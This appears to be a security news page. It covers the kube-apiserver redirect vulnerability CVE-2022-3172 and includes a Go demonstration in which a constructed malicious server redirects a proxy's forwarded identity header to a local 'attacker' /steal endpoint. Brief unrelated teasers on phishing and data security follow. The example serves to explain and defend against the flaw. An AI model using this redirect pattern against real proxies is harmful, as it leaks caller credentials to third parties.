CVE-2022-3172 - kube-apiserver can allow an aggregated API server to redirect client traffic to any URL

A vulnerability in kube-apiserver, disclosed on September 16, 2022, allows an aggregated API server to redirect client traffic to any URL. A request that the API server proxies to a malicious aggregated API server can therefore be sent on to an attacker-chosen destination, so the client may perform unexpected actions and the API server's credentials may be disclosed to a third party. The aggregation layer of the Kubernetes API server lets operators extend the API server with additional resource types and paths that are served by separately registered API servers (APIService objects). Exploitation requires control of an aggregated API server that is registered with the cluster, so restricting who may create APIService objects, and reviewing the ones already registered, limits exposure until the cluster is upgraded to a fixed release (v1.25.1, v1.24.5, v1.23.11 or v1.22.14).
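To make the failure mode concrete, the following added example (written for this page, not code from kube-apiserver or the Kubernetes project) models a proxy that forwards a caller's identity to an upstream API server. A constructed "malicious aggregated server" answers every request with a 302 to a constructed "attacker" endpoint, and the proxy is run once with Go's default redirect-following client and once with redirects disabled. The identity header name `X-Remote-User` and the paths are assumptions chosen for illustration; the point is that a proxy which follows a redirect re-sends the request, with its forwarded headers, to whatever host the upstream named.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// userHeader is the header the example proxy uses to forward the caller's
// identity upstream. Assumed name for illustration only.
const userHeader = "X-Remote-User"

// newAttackerServer stands in for a third-party host. It records the identity
// header value it receives, if any. Constructed for the example.
func newAttackerServer(seen *string) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		*seen = r.Header.Get(userHeader)
		w.WriteHeader(http.StatusOK)
	}))
}

// newRedirectingServer stands in for a malicious aggregated API server: every
// request is answered with a redirect to attackerURL. Constructed for the example.
func newRedirectingServer(attackerURL string) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, attackerURL, http.StatusFound)
	}))
}

// proxy issues one upstream request on behalf of a caller, attaching the
// caller's identity header. followRedirects selects the client's redirect policy:
// true is Go's default (follow up to 10 redirects), false returns the 3xx
// response to the caller instead of chasing the Location header.
func proxy(target string, followRedirects bool) (int, error) {
	client := &http.Client{}
	if !followRedirects {
		client.CheckRedirect = func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		}
	}
	req, err := http.NewRequest(http.MethodGet, target, nil)
	if err != nil {
		return 0, err
	}
	req.Header.Set(userHeader, "alice")
	resp, err := client.Do(req)
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()
	return resp.StatusCode, nil
}

// Leaks runs the whole scenario under one redirect policy and returns the
// identity the attacker endpoint observed ("" when nothing reached it), the
// status the proxy saw, and any transport error.
func Leaks(followRedirects bool) (string, int, error) {
	var seen string
	attacker := newAttackerServer(&seen)
	defer attacker.Close()
	evil := newRedirectingServer(attacker.URL + "/steal")
	defer evil.Close()
	status, err := proxy(evil.URL+"/apis/example.io/v1/things", followRedirects)
	return seen, status, err
}

func main() {
	for _, follow := range []bool{true, false} {
		seen, status, err := Leaks(follow)
		fmt.Printf("followRedirects=%v status=%d attackerSaw=%q err=%v\n", follow, status, seen, err)
	}
}
```

With redirects followed, the attacker endpoint receives the forwarded identity and the proxy reports a 200 from a host it never intended to talk to; with `http.ErrUseLastResponse` the proxy gets the 302 back, nothing leaves the intended upstream, and the caller can be told the upstream misbehaved. Note that Go's client does strip `Authorization` and cookie headers on cross-host redirects, but custom headers such as the forwarded identity above are re-sent, which is why "do not follow redirects" is the safe default for any proxy that authenticates to the upstream on a caller's behalf.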

Work and Life Have Intertwined: Why You Need to Protect Against Phishing on Both Fronts

Don't bring your personal life into the office; don't bring your work stuff home — these were already difficult tasks prior to the 2020 pandemic. Now, with hybrid work settling in, they have become nearly impossible to achieve. Where we work is no longer tethered to a static location. From the Wi-Fi we connect to, to the devices we use for work, our personal and professional lives are now closely intertwined.

Initial Access Brokers: What They Are, How They Gain Access, and Who Uses Their Services

Imagine a burglar. They’ve spent large amounts of time researching their target — your house. They’ve perfected their infiltration techniques, found your weak points, learned your schedule, and know the best time to strike. They’ve shown up when you least expect it and jimmied open the lock on the back door. And now, rather than head inside and steal your valuables, they hold the door open for someone else.

Now Available: Nightfall Expands Data Security and Compliance for Salesforce Customers

By design, Salesforce is an environment where customer PII and other sensitive information must be shared and stored. However, compliance regulations like PCI DSS, HIPAA, GDPR, CCPA, and others limit this storage and usage of customer data to only what’s justifiably required for an organization to carry out its duties. Even then, there are requirements for how this data should be stored – like whether it should be encrypted, for example.

How to End Password Reuse on the Web

Password reuse is common, and it lets a cybercriminal who obtains one of your passwords from a breach try it against every other account you own. Despite knowing that it can leave their accounts compromised, most people still reuse passwords. Results from an online security survey by Google and Harris Poll found that: As cybercriminals use more sophisticated attacks, organizations must emphasize good cyber hygiene practices to prevent data breaches.

Top Phishing and Social Media Threats: Key Findings from the Quarterly Threat Trends & Intelligence Report

In today’s online landscape, it is crucial for organizations to stay on top of the threats that put their enterprises at risk. Agari and PhishLabs have put together their Quarterly Threat Trends & Intelligence Report detailing their analysis of phishing and social media attacks this quarter. The report presents statistics regarding the volume of attacks, the tactics used by cybercriminals, and the main targets of these attacks, documenting the changes since last quarter.

What Does Triage Mean in Cybersecurity?

In cybersecurity, triage is an incident response practice for identifying, prioritizing, and resolving attacks, threats, and resulting damage within a network. When multiple attacks occur at once, the security team must decide which systems or devices to assess first so that the most important devices and data can be contained, remediated, and salvaged before further damage is done.

Cybersecurity Grant Program and 16 Required Elements

The Department of Homeland Security (DHS) on September 16, 2022 announced a first-of-its-kind cybersecurity grant program specifically for state, local, and territorial (SLT) governments across the country with funding in the amount of $200 million for Fiscal Year (FY) 2022, $400 million for FY 2023, $300 million for FY 2024, and $100 million for FY 2025.